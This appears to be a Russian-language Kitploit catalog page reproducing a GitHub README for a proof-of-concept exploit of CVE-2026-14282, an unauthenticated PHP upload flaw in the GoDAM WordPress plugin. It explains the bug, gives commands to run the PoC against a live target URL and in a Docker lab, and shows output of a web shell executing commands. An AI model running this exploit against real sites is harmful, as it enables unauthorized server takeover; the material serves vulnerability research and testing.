Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-14282 — GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282) | Kitploit
Инструменты/GitHubGitHub/nullwhisper/cve-2026-14282
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLabs & Practice
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)

Репозиторий
18 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-14282 — плагин GoDAM для WordPress <= 1.12.2: неаутентифицированная загрузка файлов -> RCE

Автор: nullwhisper
Назначение: только авторизованные исследования безопасности / проверка уязвимостей.

Что это?

Версии плагина GoDAM для WordPress <= 1.12.2 регистрируют поле WPForms под названием godam_record. Обработчик загрузки save_video_file() подключается к публичному действию wpforms_process_before_filter, поэтому он выполняется до любой проверки аутентификации. Обработчик доверяет управляемому атакующим заголовку Content-Type, принимает PHP-файл, если тип MIME начинается с video/, и перемещает его в обслуживаемую веб-сервером директорию wp-content/uploads/godam/wpforms/. Это позволяет неаутентифицированному атакующему загружать и выполнять произвольный PHP-код.

  • CVE: CVE-2026-14282
  • Продукт: плагин GoDAM для WordPress
  • Затронуто: <= 1.12.2
  • Исправлено: 2.0.0
  • Тип: неаутентифицированная произвольная загрузка файлов, ведущая к RCE
  • CVSS: 9.8 (критический)

Ссылки

  • Консультация IONIX: https://www.ionix.io/threat-center/cve-2026-14282/
  • Запись CVE: https://www.cve.org/CVERecord?id=CVE-2026-14282
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
  • Страница плагина на WordPress.org: https://wordpress.org/plugins/godam/

Файлы

root@kitploit:~
.
├── cve_2026_14282_poc.py   # Main PoC
├── lab/
│   ├── docker-compose.yml  # WordPress lab
│   └── setup.php           # Creates a WPForms form with GoDAM field
├── requirements.txt
└── README.md

Установка

root@kitploit:~
pip3 install -r requirements.txt

Использование

Живая цель

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form

Скрипт автоматически определяет ID формы WPForms и ID поля GoDAM. Если на странице несколько форм или определение не сработало, используйте:

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
    --form-id 4 --field-id 1 --cmd "whoami"

Локальный лабораторный стенд

  1. Скачайте уязвимые плагины (не распространяйте бинарные файлы):

    root@kitploit:~
    mkdir -p lab/wpforms-lite lab/godam
    cd lab/wpforms-lite
    wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
    unzip wpforms-lite.latest-stable.zip
    rm wpforms-lite.latest-stable.zip
    cd ../godam
    wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
    unzip godam.1.12.2.zip
    rm godam.1.12.2.zip
    cd ../..
    
  2. Запустите стенд:

    root@kitploit:~
    cd lab
    docker compose up -d
    
  3. Пройдите установщик WordPress по адресу http://127.0.0.1:8092.

  4. Установите и активируйте плагины, затем создайте форму и тестовую страницу:

    root@kitploit:~
    docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
    docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Запустите PoC:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
    

Проверено на localhost

Протестировано на WordPress 6.8 + WPForms Lite latest + GoDAM 1.12.2.

root@kitploit:~
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED

Почему бинарные файлы плагинов не включены

Этот репозиторий содержит только PoC и файлы оркестрации лабораторного стенда. Бинарные файлы уязвимых плагинов исключены, чтобы избежать раздувания репозитория и проблем с распространением. Скачайте конкретные уязвимые версии с WordPress.org для собственного стенда.

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и исследований. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим кодом.

Скачать инструмент